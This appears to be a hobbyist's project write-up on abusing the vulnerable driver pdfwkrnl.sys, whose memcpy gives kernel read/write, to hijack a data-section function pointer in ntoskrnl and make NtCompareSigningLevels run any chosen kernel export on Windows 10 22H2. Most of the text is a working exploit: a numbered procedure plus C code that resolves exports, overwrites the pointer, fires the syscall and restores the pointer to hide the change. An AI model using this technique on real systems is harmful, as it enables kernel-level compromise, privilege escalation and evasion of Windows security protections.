I saw this driver on loldrivers.io and thought nothing of it at first, but then I realized that its vulnerable memcpy (an arbitrary kernel memory read/write from user mode) is all we need to call kernel functions.
After remembering how a basic data-pointer swap hook works, I went looking for one in ntoskrnl.exe and found NtCompareSigningLevels, which was perfect for exploiting:
sub rsp, 28h
mov r8, cs:function_pointer
Boom! That's the big ol' bug: it loads a function pointer from a variable inside ntoskrnl's .data section. .data is writable, so with a kernel write primitive that pointer can be redirected to any kernel function, which is a big no-no (and exactly what we want). The listing below is where it lives on this build:
.data:0000000140C1DA00 function_pointer // ntoskrnl.exe
I wrote a simple library for pdfwkrnl.sys after taking a little code from another project (https://github.com/Legcsnaec/driverMapper), originally forked from ia-32-Sudo's project (his account is deleted or terminated). Then, for the exploit itself:
1. Use a hard-coded offset (RVA) for function_pointer.
2. Get ntoskrnl's base address with EnumDeviceDrivers.
3. Use the driver's read to walk ntoskrnl's PE headers to the export directory and resolve the address of the export we want to call.
4. Overwrite function_pointer with that export's address.
5. Call the user-mode NtCompareSigningLevels (exported by ntdll.dll) with our custom arguments; the kernel side calls through function_pointer, so our chosen export runs in kernel mode.
6. After it returns, write the old pointer back so it looks as if nothing happened.
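Here is the procedure above as a worked example in C. This is added illustration, not the page's library and not the driverMapper code. The export walker is the real part and is exercised against a constructed in-memory PE32+ image standing in for ntoskrnl, so it runs anywhere; the Windows-only section at the bottom assumes two hypothetical wrappers, drv_read and drv_write, around the driver's memcpy primitive, takes the function_pointer RVA (0xC1DA00) from the .data listing above (image base 0x140000000, so 22H2 only), and assumes NtCompareSigningLevels takes two integer arguments.

```c
#include <stdint.h>
#include <string.h>

/* Arbitrary-read primitive as a callback: on a real box this wraps the driver's
 * memcpy IOCTL; in this example it reads a constructed in-memory image instead. */
typedef int (*kread_fn)(uint64_t addr, void *out, size_t len, void *ctx);
static int rd32(kread_fn rd, void *ctx, uint64_t a, uint32_t *v) { return rd(a, v, 4, ctx); }
static int rd16(kread_fn rd, void *ctx, uint64_t a, uint16_t *v) { return rd(a, v, 2, ctx); }

/* Read a NUL-terminated name 8 bytes at a time so we never run far past the image tail. */
static int rd_str(kread_fn rd, void *ctx, uint64_t a, char *out, size_t cap)
{
    for (size_t off = 0; off + 8 <= cap; off += 8) {
        if (rd(a + off, out + off, 8, ctx)) return -1;
        if (memchr(out + off, 0, 8)) return 0;
    }
    return -1; /* name longer than cap */
}

/* Walk the export directory of a PE32+ image mapped at `base` using only `rd`.
 * Returns the absolute address of export `name`, or 0 if absent, forwarded, or malformed. */
uint64_t find_export(uint64_t base, const char *name, kread_fn rd, void *ctx)
{
    uint16_t mz, magic, ord; uint32_t e_lfanew, sig, exp_rva, exp_size;
    uint32_t nfuncs, nnames, funcs, names, ords, name_rva, func_rva;
    if (rd16(rd, ctx, base, &mz) || mz != 0x5A4D) return 0;                    /* "MZ"       */
    if (rd32(rd, ctx, base + 0x3C, &e_lfanew)) return 0;
    uint64_t nt = base + e_lfanew, opt = nt + 4 + 20;                          /* skip IMAGE_FILE_HEADER */
    if (rd32(rd, ctx, nt, &sig) || sig != 0x00004550) return 0;                 /* "PE\0\0"   */
    if (rd16(rd, ctx, opt, &magic) || magic != 0x20B) return 0;                 /* PE32+ only */
    /* DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT] is at offset 112 of IMAGE_OPTIONAL_HEADER64 */
    if (rd32(rd, ctx, opt + 112, &exp_rva) || rd32(rd, ctx, opt + 116, &exp_size) || !exp_rva) return 0;
    uint64_t ed = base + exp_rva;                                               /* IMAGE_EXPORT_DIRECTORY */
    if (rd32(rd, ctx, ed + 20, &nfuncs) || rd32(rd, ctx, ed + 24, &nnames) ||
        rd32(rd, ctx, ed + 28, &funcs)  || rd32(rd, ctx, ed + 32, &names)  ||
        rd32(rd, ctx, ed + 36, &ords)) return 0;
    for (uint32_t i = 0; i < nnames; i++) {
        char buf[256];
        if (rd32(rd, ctx, base + names + 4ull * i, &name_rva)) return 0;
        if (rd_str(rd, ctx, base + name_rva, buf, sizeof buf) || strcmp(buf, name)) continue;
        if (rd16(rd, ctx, base + ords + 2ull * i, &ord) || ord >= nfuncs) return 0;
        if (rd32(rd, ctx, base + funcs + 4ull * ord, &func_rva)) return 0;
        /* An RVA inside the export directory is a forwarder string (ntoskrnl forwards some to hal), not code */
        if (func_rva >= exp_rva && func_rva < exp_rva + exp_size) return 0;
        return base + func_rva;
    }
    return 0;
}

/* Constructed stand-in for ntoskrnl: just enough PE32+ layout for the walker (example data, not a real image). */
#define FAKE_BASE 0xFFFFF80000000000ull
static uint8_t g_image[0x500];
static void put32(uint32_t off, uint32_t v) { memcpy(g_image + off, &v, 4); }
static void put16(uint32_t off, uint16_t v) { memcpy(g_image + off, &v, 2); }
static int buf_read(uint64_t addr, void *out, size_t len, void *ctx)
{
    (void)ctx;
    if (addr < FAKE_BASE || addr - FAKE_BASE + len > sizeof g_image) return -1;
    memcpy(out, g_image + (addr - FAKE_BASE), len);
    return 0;
}
uint64_t lookup_fake(const char *name)
{
    const char *exp_names[4] = {"ExAllocatePool", "NtCompareSigningLevels", "ZwClose", "HalForwardedThing"};
    uint32_t func_rvas[4] = {0x1000, 0x2000, 0x3000, 0x280};      /* 0x280 lies inside the export dir: a forwarder */
    memset(g_image, 0, sizeof g_image);
    put16(0x000, 0x5A4D); put32(0x03C, 0x80);                      /* MZ, e_lfanew                     */
    put32(0x080, 0x00004550); put16(0x098, 0x20B);                 /* PE\0\0, PE32+ magic              */
    put32(0x098 + 112, 0x200); put32(0x098 + 116, 0x100);          /* export dir RVA 0x200, size 0x100 */
    put32(0x214, 4); put32(0x218, 4);                              /* NumberOfFunctions / NumberOfNames */
    put32(0x21C, 0x300); put32(0x220, 0x320); put32(0x224, 0x340); /* AddressOfFunctions/Names/NameOrdinals */
    strcpy((char *)g_image + 0x280, "hal.HalForwardedThing");
    for (int i = 0; i < 4; i++) {
        put32(0x300 + 4 * i, func_rvas[i]); put32(0x320 + 4 * i, 0x400 + 0x20 * i); put16(0x340 + 2 * i, (uint16_t)i);
        strcpy((char *)g_image + 0x400 + 0x20 * i, exp_names[i]);
    }
    return find_export(FAKE_BASE, name, buf_read, NULL);
}

#ifdef _WIN32
#include <windows.h>
#include <psapi.h>
/* Hypothetical wrappers around the vulnerable driver's memcpy IOCTL (not the page's library). */
extern int drv_read(uint64_t kaddr, void *out, size_t len);
extern int drv_write(uint64_t kaddr, const void *in, size_t len);
static int drv_read_cb(uint64_t a, void *o, size_t n, void *ctx) { (void)ctx; return drv_read(a, o, n); }
/* RVA of function_pointer from the page's listing (.data:0x140C1DA00, image base 0x140000000): 22H2 only. */
#define FUNCTION_POINTER_RVA 0xC1DA00ull
typedef LONG (NTAPI *NtCompareSigningLevels_t)(ULONG, ULONG);   /* assumed prototype: two integer args */

/* Redirect function_pointer to export `name`, fire it through the NtCompareSigningLevels syscall, restore it. */
LONG call_kernel_export(const char *name, ULONG a1, ULONG a2)
{
    LPVOID bases[1]; DWORD needed;
    if (!EnumDeviceDrivers(bases, sizeof bases, &needed)) return -1;         /* entry 0 is ntoskrnl */
    uint64_t ntos = (uint64_t)(uintptr_t)bases[0], slot = ntos + FUNCTION_POINTER_RVA, saved;
    uint64_t target = find_export(ntos, name, drv_read_cb, NULL);
    NtCompareSigningLevels_t ncsl = (NtCompareSigningLevels_t)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtCompareSigningLevels");
    if (!target || !ncsl || drv_read(slot, &saved, 8) || drv_write(slot, &target, 8)) return -1;
    LONG st = ncsl(a1, a2);      /* kernel calls through function_pointer, now our export; expect 0xC0000428 back */
    drv_write(slot, &saved, 8);  /* put the original pointer back before anything looks at it */
    return st;
}
#endif
```

On Windows, link against psapi for EnumDeviceDrivers and supply drv_read/drv_write from your own wrapper around the driver. The status call_kernel_export returns will normally be 0xC0000428 regardless of what the hijacked export did, so confirm the call through its side effect (or a follow-up kernel read of whatever the callee changed) rather than the return code.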
This was a cool little project; I racked my brain over it, and it took around 5 hours.
As written this only works on Windows 10 22H2, because the function_pointer offset is hard-coded, but the method can be applied to any function inside ntoskrnl or win32k that calls through a pointer stored in writable data.
An NTSTATUS of STATUS_INVALID_IMAGE_HASH (0xC0000428) will almost always come back, because NtCompareSigningLevels returns it whenever the function it called returned a non-zero value; so that status is not a failure, and the hijacked function's own return value does not reach user mode through the syscall.
All I ask for is credit for my idea. Thanks for the small read; feel free to leave a follow or fork to show your support.
Goodbye and have a great day (: